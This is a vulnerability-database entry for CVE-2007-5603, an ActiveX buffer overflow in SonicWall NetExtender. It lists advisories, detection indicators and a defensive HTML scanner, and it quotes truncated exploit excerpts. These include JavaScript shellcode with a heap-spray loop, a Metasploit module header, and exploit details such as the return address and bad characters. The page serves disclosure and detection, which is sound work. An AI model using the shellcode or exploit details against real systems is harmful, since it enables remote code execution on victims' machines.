CVE-2007-5603
Published 2007-11-05
CVE-2007-5603: Stack-based buffer overflow in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allows remote…
Priority: P3 · 52 · critical · CVSS 2.0 base score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Exploit: public exploit indexed (see the Exploit-DB and Metasploit entries below)
EPSS: 37.98% (98.4th percentile)
Stack-based buffer overflow in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allows remote attackers to execute arbitrary code via a long string in the second argument to the AddRouteEntry method.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sonicwall | netextender | — | — |
| sonicwall | ssl_vpn | <= 2.1 | — |
| sonicwall | ssl_vpn | <= 2.5 | — |
Detection & IOCs (extracted from sources)
- Monitor for ActiveX instantiation of the NELaunchCtrl / NELaunchX.dll control in a browser context, particularly calls to the AddRouteEntry() method with an oversized second argument.
- Detect the heap-spray NOP sled pattern in browser memory: repeated %u9090%u9090 unescape sequences used to position shellcode prior to AddRouteEntry exploitation.
- The Metasploit exploit targets IE 6 on Windows XP SP2 English; the return address 0x7e497c7b is used as the SEH/RET overwrite. Flag memory writes to this address in exploit telemetry.
- Payload bad characters for this exploit are null byte, tab, LF, CR, single-quote, and backslash. Encoded payloads avoiding these bytes in network traffic targeting the ActiveX control are a strong indicator.
- The exploit delivers an HTML page containing a randomised variable name referencing the NELaunchCtrl ActiveX object and calling AddRouteEntry with a 36-byte random prefix followed by a packed return address. Inspect HTML responses for this pattern.
- The vulnerable DLL version is specifically 1.0.0.26 of NELaunchX.dll; versions of NELaunchCtrl at or above 2.1.0.51 (or 2.5.0.56 in the 2.5.x branch) are patched and should not be flagged.
- The Metasploit module's payload space is only 800 bytes with a stack adjustment of -3500; detection rules tuned to payload size should account for this constrained space.
- CVE-2007-5814 covers additional overflow vectors (serverAddress, sessionId, clientIPLower, clientIPHigher, userName, domainName, dnsSuffix) in the same ActiveX control. Detections for CVE-2007-5603 cover only the AddRouteEntry vector.
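A defender-side content check for the first two indicators above, written as an added example (not code from this page or from any of the sources it indexes): it scans page content for references to the NELaunchCtrl / NELaunchX control, for literal AddRouteEntry calls whose second argument exceeds a threshold, and for repeated %u9090 spray sequences. The sample HTML is constructed for the example, the classid value is a placeholder, and the 64-character threshold is an assumption.

```python
import re

# Indicator patterns taken from the detection notes for CVE-2007-5603.
ACTIVEX_RE = re.compile(r"NELaunchCtrl|NELaunchX\.dll", re.IGNORECASE)
# Literal call form only: ctl.AddRouteEntry(<arg1>, "<arg2>") ; calls whose
# second argument is a variable are not inspected by this simple check.
ADDROUTE_RE = re.compile(
    r"\.AddRouteEntry\s*\(\s*([^,]*)\s*,\s*([\"'])(.*?)\2",
    re.IGNORECASE | re.DOTALL,
)
SPRAY_RE = re.compile(r"(?:%u9090){4,}", re.IGNORECASE)

MAX_ROUTE_ARG = 64  # assumed threshold; legitimate route strings are short


def scan_html(html: str) -> list:
    """Return (indicator, detail) tuples for suspicious content in an HTML/JS page."""
    findings = []
    if ACTIVEX_RE.search(html):
        findings.append(("activex_instantiation", "NELaunchCtrl/NELaunchX reference"))
    for m in ADDROUTE_RE.finditer(html):
        arg2 = m.group(3)
        if len(arg2) > MAX_ROUTE_ARG:
            findings.append(("oversized_addrouteentry_arg",
                             f"second argument length {len(arg2)}"))
    for m in SPRAY_RE.finditer(html):
        findings.append(("heap_spray_nop_sled",
                         f"{m.group(0).count('%u9090')} x %u9090"))
    return findings


# Constructed sample page: placeholder classid, an oversized literal second
# argument made of 'A's, and a short %u9090 spray. Not a working exploit.
SAMPLE_HTML = (
    '<object id="ctl" classid="clsid:PLACEHOLDER-CLSID" codebase="NELaunchX.dll"></object>\n'
    "<script>\n"
    'var s = unescape("' + "%u9090" * 6 + '");\n'
    'ctl.AddRouteEntry("10.0.0.0", "' + "A" * 200 + '");\n'
    "</script>\n"
)

# Constructed benign page for comparison.
SAMPLE_CLEAN = '<script>document.title = "hello";</script>\n'

if __name__ == "__main__":
    for name, page in (("sample", SAMPLE_HTML), ("clean", SAMPLE_CLEAN)):
        print(name, scan_html(page))
```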
GHSA-mjr4-4fp3-3qf8 (ghsa_unreviewed · 2022-05-01) · CVE-2007-5603 [HIGH] CWE-119
Stack-based buffer overflow in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allows remote attackers to execute arbitrary code via a long string in the second argument to the AddRouteEntry method.
GHSA-m6f9-v9gc-f7x3 (ghsa_unreviewed · 2022-05-01 · CVSS 9.3) · CVE-2007-5814 [CRITICAL] CWE-119
Multiple buffer overflows in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allow remote attackers to execute arbitrary code via a long (1) serverAddress, (2) sessionId, (3) clientIPLower, (4) clientIPHigher, (5) userName, (6) domainName, or (7) dnsSuffix Unicode property value. NOTE: the AddRouteEntry vector is covered by CVE-2007-5603.
SonicWall advisory (vendor_sonicwall · 2007-11-05 · CVSS 9.3) · CVE-2007-5603 [CRITICAL] CWE-119
CVE-2007-5603: Stack-based buffer overflow in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allows remote attackers to execute arbitrary code via a long string in the second argument to the AddRouteEntry method.
SonicWall advisory (vendor_sonicwall · 2007-11-05 · CVSS 9.3) · CVE-2007-5814 [CRITICAL] CWE-119
CVE-2007-5814: Multiple buffer overflows in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allow remote attackers to execute arbitrary code via a long (1) serverAddress, (2) sessionId, (3) clientIPLower, (4) clientIPHigher, (5) userName, (6) domainName, or (7) dnsSuffix Unicode property value. NOTE: the AddRouteEntry vector is covered by CVE-2007-5603.
No detection rules found.
Exploit-DB (exploitdb · 2010-05-09) · CVE-2007-5603
SonicWALL SSL-VPN - NetExtender ActiveX Control Buffer Overflow (Metasploit)
---
```ruby
##
# $Id: sonicwall_addrouteentry.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender.
By sending an overly long string to the "AddRouteEntry()" method located
in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute
arbitrary code.
},
'License' => M
```
Exploit-DB (exploitdb · 2007-11-01) · CVE-2007-5603
SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote Command Execution
---
```javascript
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u2065%u0000");
var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
do {
spray += spray;
} while(spray.length
```
# milw0rm.com [2007-11-01]
Metasploit (metasploit) · SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender. By sending an overly long string to the "AddRouteEntry()" method located in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/27469
- http://securityreason.com/securityalert/3342
- http://www.kb.cert.org/vuls/id/298521
- http://www.kb.cert.org/vuls/id/WDON-78K56M
- http://www.sec-consult.com/303.html
- http://www.sec-consult.com/fileadmin/Advisories/20071101-0_sonicwall_multiple.txt
- http://www.securityfocus.com/archive/1/483097/100/0/threaded
- http://www.securityfocus.com/bid/26288
- http://www.securitytracker.com/id?1018891
- http://www.vupen.com/english/advisories/2007/3696
- https://exchange.xforce.ibmcloud.com/vulnerabilities/38220
- https://www.exploit-db.com/exploits/4594